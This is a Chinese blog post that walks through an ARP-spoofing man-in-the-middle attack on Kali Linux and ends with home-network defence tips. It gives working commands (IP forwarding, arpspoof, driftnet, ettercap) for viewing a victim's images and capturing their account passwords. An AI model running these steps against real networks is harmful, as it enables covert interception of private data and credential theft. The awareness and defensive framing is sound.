ARP攻擊,竊取隱私
嘮叨段別建議~哈哈
其實呢,這篇文章是不想發的,為什麼呢,太懶信么,科技帶來了便利同時也帶來了危險黑客太厲害,我要有他一半頭腦就好了,廢話不多說回到正題,經上次wifi攻防文章之後呢,有許多小夥伴就私聊我啊,說難道黑客破解wifi密碼就只為了蹭網么?事實當然不是,,,那到底可以做啥呢?所以我不說吧,大家就擔心了,睡也睡不著,飯也吃不香呀。
1
ARP攻擊,竊取別人信息
搭建環境:kali Linux系統當黑客攻破wifi密碼之後呢,就可以順利進入你家網路了,那麼就可以用kali,打開終端,敲敲代碼:
echo 1 >/proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward
開啟流量轉發。
原理呢:原本上網設備(手機/電腦)的數據是發送給路由器,然後路由器在發送給外網,實現上網。這個代碼呢是讓設備把數據流量轉發到黑客電腦上,在發送出去,也就是中途要經過黑客的電腦。
2
開始嗅探,要攻擊的對象
不多說了:代碼還是敲代碼,哈哈:這次呢想竊取圖片信息。
打開個新的窗口:輸入命令:arpspoof -i eth0 -t 網關ip 被攻擊者IP 回車。
3
拿取想要的結果
在打開一個窗口:代碼,繼續代碼,不要感覺貌似挺難的,應該不那麼容易被攻擊吧,想想對於黑客,這都不叫事。
輸入命令:driftnet -i eth0 回車,會自動在打開一個預覽窗口,用來顯示被攻擊者的圖片信息。
比如:這時候被攻擊者,正在看qq空間或盆友圈/發送或接受圖片等等...其實在黑客的預覽窗口中,你能看啊,他也能看。
4
竊取賬戶密碼
前面的步驟就不說了,反正就是代碼,同上,步驟也一樣,只需要更換(拿取想要的結果)就可以了。
繼續新命令:然後輸入:ettercap -Tq -i eth0 回車這時候,只要被攻擊輸入關於賬號密碼等信息,黑客就直接獲取到了你的賬號密碼了。同時也能獲取到你的這個賬號是用於登錄什麼網站的地址。想想都可怕,心裡直發抖。
請勿用於違法行為噢,否則後果自負!
僅提供學習參考,歡迎討論。
· 如何防止 ·
切記
出門在外不要隨意的蹭wifi,搞不好那是黑客,早就準備好的,座等別人鏈接。
電腦安裝殺毒軟體,裡面有一個功能叫:開啟ARP防火牆。
路由器開啟MAC綁定
上網時注意下網站的域名開頭是http還是https,不要小看這個s,他可是帶有安全加密傳輸的。
就算迫不得已鏈接了未知的網路,也不要去做重要的事,比如:打開某個購物網站購物,轉賬等操作。
TAG:同城科技 |